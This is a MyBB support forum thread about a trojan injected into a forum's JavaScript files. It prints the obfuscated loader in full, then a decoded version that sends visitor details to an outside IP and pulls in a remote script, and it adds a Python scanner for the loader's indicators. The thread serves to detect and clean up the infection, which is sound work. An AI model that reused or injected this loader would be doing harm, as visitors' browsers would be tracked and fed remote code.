MyBB Community Forums

Full Version: New Trojan Upload problem Js:Agent-PL(Trj), as reported by Avast
I want to report a trojan that was uploaded by someone to my MyBB forum. Whenever I tried to load pages of my forum, it was showing a Trojan in the pages of my forum.

Later, by searching in the code, I found the Trojan code, which was inserted into JavaScript files, and deleted it. Here is the code:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;


Can anyone give me some tips to avoid such attacks? Thanks in advance!
Are you using Facebook Connect by Nayar? Upgrade it if yes.
My AV detects it as well, but it's not doing anything because the JavaScript is not parsed. However, the AV reports it whether it is parsed or not.
Yeah, then it's not a false positive. This has been floating around the past day or so. My Avast AV was triggered by this thread as well. So that code is in some form malicious.

If your AV is not going off, you might actually have more of a problem.
The decoded script is as follows:

var _0xdc8d=["sc_co","getElementById","colorDepth","width","height","charset","location","referrer","userAgent","script","createElement","id","src","http://91.196.216.64/s.php?ref=","&cls=","&sw=","&sh=","&dc=","&lc=","&ua=","head","getElementsByTagName","appendChild"];
element=document[_0xdc8d[1]](_0xdc8d[0]);
if(!element){
	cls=screen[_0xdc8d[2]];
	sw=screen[_0xdc8d[3]];
	sh=screen[_0xdc8d[4]];
	dc=document[_0xdc8d[5]];
	lc=document[_0xdc8d[6]];
	refurl=escape(document[_0xdc8d[7]]);
	ua=escape(navigator[_0xdc8d[8]]);
	var js=document[_0xdc8d[10]](_0xdc8d[9]);
	js[_0xdc8d[11]]=_0xdc8d[0];
	js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;
	var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);
};

The AV programs are probably throwing the warnings on the IP/URL, which is detected even though it's hex-coded. The IP/URL is from Russia and, it seems, is blacklisted by the AV programs.

As for the OP's problem of the script actually being run and showing a trojan window, which is what this script does, it should not happen in normal circumstances unless you have enabled posting HTML or have a plugin with an exploit that allows JavaScript to get executed.
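The decoding step above (turning the "\xHH" escapes back into readable strings so the loader URL shows up) can be automated over a whole forum tree. The following is an added example, not code from the thread or from MyBB: it walks every .js file under a directory, flags the hex-escaped `_0x...` string-array pattern, decodes the escapes and reports lines whose decoded text contains the indicators from the decoded script (the host, the `s.php?ref=` path and the `sc_co` element id). The `SAMPLE_JS` string is a constructed fragment of the injected array used so the scan runs offline.

```python
"""Scan a MyBB install's .js files for the hex-escaped loader from this thread."""
import re
import sys
from pathlib import Path

# JavaScript "\xHH" escapes; decoding them recovers the plain strings.
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
# A string array named _0x... packed with hex escapes is the obfuscation signature.
OBFUSCATED_ARRAY = re.compile(r'var\s+_0x[0-9a-f]+\s*=\s*\[(?:"(?:\\x[0-9A-Fa-f]{2})+",?\s*){3,}')
# Plain-text indicators taken from the decoded script posted above.
DECODED_INDICATORS = ("91.196.216.64", "s.php?ref=", "sc_co")

def decode_hex_escapes(text: str) -> str:
    """Replace every \\xHH escape with the character it encodes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)

def scan_text(text: str) -> list[str]:
    """Return a list of findings for one file's contents (empty if clean)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if OBFUSCATED_ARRAY.search(line):
            findings.append(f"line {lineno}: hex-escaped string array (_0x... obfuscation)")
        decoded = decode_hex_escapes(line)
        for ioc in DECODED_INDICATORS:
            if ioc in decoded:
                findings.append(f"line {lineno}: decoded content contains {ioc!r}")
    return findings

def scan_tree(root: Path) -> dict[str, list[str]]:
    """Scan every .js file under root; map relative path -> findings."""
    report = {}
    for path in sorted(root.rglob("*.js")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path.relative_to(root))] = hits
    return report

# Constructed sample: three entries of the injected array, then a clean line.
SAMPLE_JS = (
    'var _0xdc8d=["\\x73\\x63\\x5F\\x63\\x6F","\\x69\\x64",'
    '"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x39\\x31\\x2E\\x31\\x39\\x36\\x2E\\x32\\x31\\x36'
    '\\x2E\\x36\\x34\\x2F\\x73\\x2E\\x70\\x68\\x70\\x3F\\x72\\x65\\x66\\x3D"];\n'
    "var jsDir = 'jscripts';\n"
)

if __name__ == "__main__":
    if len(sys.argv) == 2:  # usage: python scan.py /path/to/forum
        for rel, hits in scan_tree(Path(sys.argv[1])).items():
            print(rel, *hits, sep="\n  ")
    else:
        print(*scan_text(SAMPLE_JS), sep="\n")
```

Files the scan reports should be restored from a clean copy of the MyBB release, and their modification times compared against the web server's access log to narrow down how the write happened.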
(2012-01-06, 11:38 PM) labrocca Wrote: Yeah, then it's not a false positive. This has been floating around the past day or so. My Avast AV was triggered by this thread as well. So that code is in some form malicious.

If your AV is not going off, you might actually have more of a problem.

It is a false positive. HTML is disabled here and the thing doesn't run, but the AV detects the IP.
Pirata, I think he's saying someone put that into one of his JS files on his forum.
I am having this problem on my forum too.
How can I fix it?

Thanks
@Booher, yes, you're right, I guess.

If that was inserted into your JS files, you must remove the code and search for the door which allowed the hacker to insert the code.
This is the problem I have as well. As soon as I replace the files, my site becomes re-infected. Is there a way to find out how it's getting in, or a list of the tightest permission settings somewhere for security?

And also, how does one disable HTML on their forum? I remember seeing it somewhere but can't seem to find it.